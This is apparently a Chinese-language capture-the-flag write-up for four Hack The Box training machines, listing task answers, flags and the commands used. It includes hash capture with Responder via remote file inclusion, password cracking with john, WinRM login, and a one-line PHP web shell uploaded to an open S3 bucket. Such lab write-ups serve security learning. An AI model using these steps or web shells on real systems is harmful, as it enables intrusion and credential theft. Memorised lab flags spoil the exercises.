---

靶机：Sequel

考察sql注入

Task1

问题：在扫描过程中，我们发现哪个端口为 MySQL 提供服务？

3306

nmap扫描一下，如果不确定扫到哪可以用参数-v

sudo nmap -sV -sC -v 10.129.190.194

Task2

问题：目标正在运行哪个社区开发的 MySQL 版本？

MariaDB

前一题可以看version，发现是MariaDB

Task3

问题：使用MySQL命令行客户端时，我们需要使用什么开关来指定登录用户名？

-u

Task4

问题：哪个用户名允许我们在不提供密码的情况下登录此 MariaDB 实例？

root

Task5

问题：在 SQL 中，我们可以使用什么符号在查询中指定要显示表中的所有内容？

*

Task6

问题：在SQL中我们需要用什么符号来结束每个查询？

;

Task7

问题：此 MySQL 实例中存在三个在所有 MySQL 实例中通用的数据库。该主机独有的第四个名字是什么？

htb

使用mysql以root用户连接数据库

sudo mysql -h 10.129.190.194 -u root

然后查询数据库

show databases;

Task8

问题：提交flag

7b4bec00d1a39e3dd4e021ec3d915da8

我们先使用数据库

use htb;

然后查询config表，得到flag

靶机：Crocodile

考察的是FTP传输协议相关知识

Task1

问题：在扫描过程中，什么NMAP扫描开关使用默认脚本？

-sC

Task2

问题：发现端口 21 上运行的服务版本是什么？

vsftpd 3.0.3

使用nmap的参数-sC

sudo nmap -sV -sC -v 10.129.1.15

Task3

问题：对于“允许匿名 FTP 登录”消息，我们会返回什么 FTP 代码？

230

Task4

问题：使用FTP客户端连接到FTP服务器后，当提示匿名登录时，我们提供什么用户名？

Anonymous

由前一题扫描信息第一行可以得知

Task5

问题：匿名连接到FTP服务器后，我们可以使用什么命令下载在FTP服务器上找到的文件？

get

Task6

问题： 我们从FTP服务器下载的“allowed.userlist”中听起来权限更高的用户名是什么？

admin

我们下载下来

get allowed.userlist

Task7

问题： 目标主机上正在运行哪个版本的Apache HTTP Server？

Apache httpd 2.4.41

nmap扫描结果有

Task8

问题：我们可以在Gobuster中使用什么开关来指定我们正在寻找特定的文件类型？

-x

我们尝试用其他用户名登录发现不行
又知道该ip存在80端口的http服务
我们用前面靶机使用过的工具gobuster去爆破

gobuster dir --url 10.129.1.15 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html

Task9

问题：我们可以用目录暴力识别哪个PHP文件，从而提供向web服务进行身份验证的机会？

login.php

由前一题可知

Task10

提交flag

c7110277ac44d78b6a9fff2232434d16

发现存在login.php，拿得到的用户名admin登陆一下

靶机：Responder

考察的是WinRM服务

Task1

问题：当使用IP地址访问web服务时，我们被重定向到的域是什么？

unika.htb

Task2

问题：服务器上正在使用哪种脚本语言来生成网页？

PHP

由于访问不到，我们可以用vim编辑器修改hosts文件，将机器IP指向unika.htb，重新访问

sudo vim /etc/hosts

然后输入a启用编辑模式，添加上去
然后esc退出，输入:启用末行模式，最后输入wq保存并退出

然后nmap扫描发现是php服务

Task3

问题： 用于加载不同语言版本网页的URL参数的名称是什么？

page

点击EN可以修改语言，可以知道参数为page

Task4

问题：“page”参数的以下哪个值是利用本地文件包含（LFI）漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”

../../../../../windows/system32/drivers/etc/hosts

很明显的目录穿越实现本地文件包含

Task5

问题：“page”参数的以下哪个值是利用远程文件包含（RFI）漏洞的示例：“french.html”、“//10.10.14.6/somefile”、“…/…/…/…/…/windows/system32/drivers/etc/hosts”、“minikatz.exe”

//10.10.14.6/somefile

远程文件包含漏洞

Task6

问题：NTLM代表什么？

New Technology LAN Manager

Task7

问题：我们在Responder工具中使用哪个标志来指定网络接口？

-I

Task8

问题：有几种工具可以接受 NetNTLMv2 质询/响应，并尝试数百万个密码，以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为“john”，但全名是什么？

John The Ripper

Task9

问题： 管理员用户的密码是什么？

badminton

获取方法如下
我们先查看自己ip地址

ifconfig

然后选择tun0
修改url的ip进行远程文件包含
然后抓包

sudo responder -I tun0

接着访问我们修改过后的url，回到终端就能看到NTLM hash了

复制整个hash值，退出抓包，把hash值存入文件
然后用john和kali自带的字典破解

john -w=/usr/share/wordlists/rockyou.txt hash.txt

Task10

问题：我们将使用 Windows 服务（即在机器上运行）使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP？

5985

用nmap扫描全部端口

Task11

问题：提交flag

ea81b7afddd03efaa0945333ed147fac

步骤如下
我们先修改下扫描参数-sV，然后扫出来wsman服务（即windows远程管理的端口）
那么我们使用工具evil-winrm连接

evil-winrm -i 10.129.152.77 -u administrator -p badminton

得到flag

靶机：Three

考察的是AWS服务

Task1

问题：打开了多少个TCP端口？

2

nmap扫一下

Task2

问题： 网站“联系人”部分提供的电子邮件地址的域是什么？

thetoppers.htb

登录该ip，拉到网页最下面找到

Task3

问题：在没有DNS服务器的情况下，我们可以使用哪个Linux文件将主机名解析为IP地址，以便能够访问指向这些主机名的网站？

/etc/hosts

Task4

问题：在进一步枚举期间发现哪个子域？

s3.thetoppers.htb

步骤如下

gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain

发现有个404状态的，猜测就是

Task5

问题：发现的子域上运行的是哪个服务？

amazon s3

将该域名添加到/etc/hosts，访问http://s3.thetoppers.htb/

Task6

问题：哪个命令行实用程序可以用于与在发现的子域上运行的服务交互？

awscli

Task7

问题：哪个命令用于设置AWS CLI安装？

aws configure

Task8

问题：上述实用程序使用什么命令列出所有 S3 存储桶？

aws s3 ls

Task9

问题：此服务器配置为运行用何种web脚本语言编写的文件？

PHP

Task10

问题：提交flag

a980d99281a28d638ac68b9bf9453c2b

解题过程
使用命令通过指定的 S3 端点连接到 s3.thetoppers.htb，然后列出 thetoppers.htb 存储桶中的对象

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

接着我们在本地写个马

echo '<?php system($_GET["cmd"]); ?>' > shell.php

传马

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

成功写入

然后访问http://thetoppers.htb/shell.php命令执行得到flag